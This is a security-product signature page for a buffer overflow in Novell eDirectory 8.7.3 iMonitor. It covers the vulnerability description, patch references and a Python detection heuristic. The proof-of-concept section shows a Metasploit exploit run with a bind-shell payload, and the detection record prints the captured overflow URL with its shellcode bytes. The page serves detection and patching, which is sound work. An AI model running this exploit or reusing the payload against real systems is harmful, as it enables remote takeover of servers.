Novell eDirectory iMonitor buffer overflow (HTTP_Novell_iMonitor_BO)
About this signature or vulnerability
Proventia G-Series, Proventia Desktop, Proventia Network IPS, RealSecure Server Sensor, RealSecure Network Sensor, Proventia M-Series, BlackICE Agent for Server, BlackICE PC Protection, BlackICE Server Protection, Proventia Server for Windows:
This signature detects an attempt to overflow the Novell eDirectory Server iMonitor by sending a specially crafted URL.
Default risk level
High
Sensors that have this signature
Proventia G-Series: XPU 24.38, Proventia Desktop: 8.0.812.1770, Proventia Network IPS: XPU 1.77, RealSecure Server Sensor: XPU 24.38, RealSecure Network Sensor: XPU 24.38, Proventia M-Series: XPU 1.77, BlackICE Agent for Server: 3.6epi, BlackICE PC Protection: 3.6cpi, BlackICE Server Protection: 3.6.cpi, Proventia Server for Windows: 1.0.914.1770
Systems affected
Windows NT: 4.0, Windows 2000: Any version, Novell eDirectory: 8.7.3, Windows 2003: Any version
Type
Unauthorized Access Attempt
Vulnerability description
Novell eDirectory is a software package that provides a Lightweight Directory Access Protocol (LDAP) directory service for integrating enterprise and e-business applications. Novell eDirectory version 8.7.3, when running on Microsoft Windows, is vulnerable to a buffer overflow caused by improper bounds checking in iMonitor. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with SYSTEM-level privileges, or possibly cause dhost.exe to crash.
How to remove this vulnerability
Apply the patch for this vulnerability listed in Novell Technical Information Document TID10098568. See References.
References
Secunia Security Advisory: SA16393
Novell eDirectory iMonitor Buffer Overflow Vulnerability
http://secunia.com/advisories/16393/
Novell Technical Information Document TID10098568
Buffer overflow vulnerability against eDirectory 8.7.3 imonitor on Windows
http://support.novell.com/cgi-bin/search/searchtid.cgi?/10098568.htm
Novell Technical Information Document TID2972038
eDirectory 8.7.3 iMonitor for Win32 - TID2972038
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972038.htm
CERT Vulnerability Note VU#213165
Novell eDirectory iMonitor vulnerable to buffer overflow
http://www.kb.cert.org/vuls/id/213165
ISS X-Force
Novell eDirectory iMonitor buffer overflow
http://www.iss.net/security_center/static/21794.php
CVE
CVE-2005-2551
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2551
■Proof-of-concept code
===========================
Exploit:    Name      Default          Description
--------    ------    ---------------  -----------------------------------
optional    SSL                        Use SSL
required    RHOST     192.168.221.180  The target address
optional    VHOST                      The virtual host name of the server
required    RPORT     8008             The target port

Payload:    Name      Default   Description
--------    --------  --------  ------------------------------------------
required    EXITFUNC  thread    Exit technique: "process", "thread", "seh"
required    LPORT     4444      Listening port for bind shell
Target: Windows (ALL) - eDirectory 8.7.3 iMonitor
msf edirectory_imonitor(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit Windows (ALL) - eDirectory 8.7.3 iMonitor
[*] Overflow request sent, sleeping for four seconds
[*] Exiting Bind Handler.
msf edirectory_imonitor(win32_bind) >
■Detection
Date/Time | 2006-06-18 22:26:11 JST |
Tag Name | HTTP_Novell_iMonitor_BO |
Alert Name | HTTP_Novell_iMonitor_BO |
Severity | High |
Observance Type | Intrusion Detection |
Combined Event Count | 1 |
Cleared Flag | false |
Target IP Address | 192.168.37.180 |
Target Object Name | 8008 |
Target Object Type | Target Port |
Source IP Address | 192.168.221.11 |
SourcePort Name | 1633 |
Sensor IP Address | 10.4.6.100 |
Sensor Name | network_sensor_1 |
:accessed | yes |
:evasions | uses non-ASCII characters; |
:intruder-ip-addr | 192.168.221.11 |
:intruder-port | 1633 |
:server | 192.168.221.180:8008 |
:URL | /nds/佞7JBJ・A@GG@荘NJB屁C7J舛7FOFKKHJB傲・Fヨ@'@B櫑O廿GB澄FH'ヨHJI鋒FN桝廂G菅CB姆N妁訂僊O・@鎗@F・・GHON訪・泡OF滲GCO・・訂@C・蜂ヨGO・吏湧・ヨFNB7NF廿敦BK價鵰'ヨ趨K友僭7'@ヨ炉@O崇剞的BGB剞A・・CA只I'H'婁選'呂哲O銭・'O7N |
:victim-ip-addr | 192.168.37.180 |
:victim-port | 8008 |
algorithm-id | 2106212 |
IANAProtocolId | 6 |
Packet DestinationAddress | 192.168.37.180 |
Packet DestinationPort | 8008 |
Packet DestinationPortName | http-alt |
Packet SourceAddress | 192.168.221.11 |
Packet SourcePort | 1633 |
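The event above flags the request on two traits visible in the record: a path under /nds/ that is far longer than any legitimate iMonitor URL, and raw non-ASCII bytes in it (the ":evasions" field). The following Python heuristic reproduces that detection logic on constructed sample requests; it is an added illustration, not the ISS/Proventia signature itself, and the /nds/ prefix check, the 256-byte length threshold and the sample traffic are assumptions chosen here, not values from the advisory.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumed, not from the advisory: iMonitor paths live under /nds/, and a
# path longer than MAX_PATH_LEN bytes is treated as suspicious.
IMONITOR_PREFIX = b"/nds/"
MAX_PATH_LEN = 256  # constructed threshold; tune per environment
REQUEST_LINE = re.compile(rb"^(GET|POST|HEAD)\s+(\S+)\s+HTTP/1\.[01]\r?\n")


def inspect_request(raw: bytes, src: str, dst: str, dport: int):
    """Return an alert dict (fields mirror the event record) or None."""
    m = REQUEST_LINE.match(raw)
    if not m:
        return None
    # Strip the query string and decode %xx once, so percent-encoded
    # high bytes are counted the same as raw ones.
    path = unquote_to_bytes(m.group(2).split(b"?", 1)[0])
    if not path.startswith(IMONITOR_PREFIX):
        return None
    evasions = []
    if any(b >= 0x80 for b in path):
        evasions.append("uses non-ASCII characters")
    if len(path) > MAX_PATH_LEN:
        evasions.append(f"path length {len(path)} > {MAX_PATH_LEN}")
    if not evasions:
        return None
    shown = path[:64].decode("latin-1") + ("..." if len(path) > 64 else "")
    return {
        "Tag Name": "HTTP_Novell_iMonitor_BO",
        "Severity": "High",
        ":intruder-ip-addr": src,
        ":victim-ip-addr": dst,
        ":victim-port": dport,
        ":evasions": "; ".join(evasions),
        ":URL": shown,
    }


# Constructed sample traffic (not captured from a real system).
BENIGN = b"GET /nds/summary HTTP/1.1\r\nHost: 192.168.221.180:8008\r\n\r\n"
SUSPECT = b"GET /nds/" + b"A" * 300 + bytes(range(0x80, 0xFF)) + b" HTTP/1.0\r\n\r\n"


def demo():
    """Run both samples through the heuristic; returns [None, alert]."""
    return [inspect_request(r, "192.168.221.11", "192.168.37.180", 8008)
            for r in (BENIGN, SUSPECT)]


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```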